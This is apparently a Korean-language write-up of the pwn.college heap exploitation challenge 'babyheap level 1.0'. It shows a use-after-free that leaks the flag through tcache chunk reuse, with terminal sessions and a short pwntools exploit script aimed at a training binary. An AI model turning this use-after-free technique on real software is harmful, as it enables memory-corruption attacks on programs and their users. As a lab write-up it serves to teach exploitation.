![[pwn.college] DAM Level 1.0 Write up](https://cdn.hashnode.com/res/hashnode/image/upload/v1700397564061/648e6dae-1067-4349-93a8-bd77a5f14f02.png?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
hacker@dynamic-allocator-misuse-level-1-0:~$ /challenge/babyheap_level1.0
###
### Welcome to /challenge/babyheap_level1.0!
###
This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of
challenges, you will become familiar with the concept of heap exploitation.
This challenge can manage up to 1 unique allocations.
[*] Function (malloc/free/puts/read_flag/quit):
기능이 총 malloc, free, puts, read_flag, quit 5개가 있습니다. 하나씩 기능을 분석해보겠습니다.
malloc
[*] Function (malloc/free/puts/read_flag/quit): malloc
Size: 100
[*] allocations[0] = malloc(100)
[*] allocations[0] = 0x55788429d2c0
사이즈를 입력받고, 입력 받은 사이즈만큼 malloc을 할당받습니다.
free
malloc으로 할당 받았던 청크를 해제합니다.
puts
[*] Function (malloc/free/puts/read_flag/quit): puts
[*] puts(allocations[0])
Data:
malloc으로 할당받았던 청크를 출력해줍니다.
read_flag
[*] Function (malloc/free/puts/read_flag/quit): read_flag
[*] flag_buffer = malloc(689)
[*] flag_buffer = 0x55d7abe922c0
[*] read the flag!
689 크기의 청크를 할당받고 해당 청크에 flag를 입력하는 것 같습니다.
read_flag 에서 689만큼 할당 요청을 하는 것을 보고 malloc(689) -> free 를 해서 tcache에 추가해놓고 read_flag 로 해제된 청크를 다시 할당받은 뒤 puts 로 출력하면 flag가 출력될 것 같아서 해보니 출력되었습니다.
hacker@dynamic-allocator-misuse-level-1-0:~$ /challenge/babyheap_level1.0
###
### Welcome to /challenge/babyheap_level1.0!
###
This challenge allows you to perform various heap operations, some of which may involve the flag. Through this series of
challenges, you will become familiar with the concept of heap exploitation.
This challenge can manage up to 1 unique allocations.
[*] Function (malloc/free/puts/read_flag/quit): malloc
Size: 689
[*] allocations[0] = malloc(689)
[*] allocations[0] = 0x563da93382c0
[*] Function (malloc/free/puts/read_flag/quit): free
[*] free(allocations[0])
[*] Function (malloc/free/puts/read_flag/quit): read_flag
[*] flag_buffer = malloc(689)
[*] flag_buffer = 0x563da93382c0
[*] read the flag!
[*] Function (malloc/free/puts/read_flag/quit): puts
[*] puts(allocations[0])
Data: pwn.college{-----flag-----}
익스플로잇 코드로도 정상적으로 출력 되었습니다.
from pwn import *
p = process("/challenge/babyheap_level1.0")
p.sendlineafter(b'):', b'malloc')
p.sendlineafter(b'Size:', b'689')
p.sendlineafter(b'):', b'free')
p.sendlineafter(b'):', b'read_flag')
p.sendlineafter(b'):', b'puts')
p.recvuntil(b'Data: ')
print(p.recvline()[:-1])
hacker@dynamic-allocator-misuse-level-1-0:~$ python ex_code/DAM/1.py
[+] Starting local process '/challenge/babyheap_level1.0': pid 4355
b'pwn.college{-----flag-----}'
[*] Stopped process '/challenge/babyheap_level1.0' (pid 4355)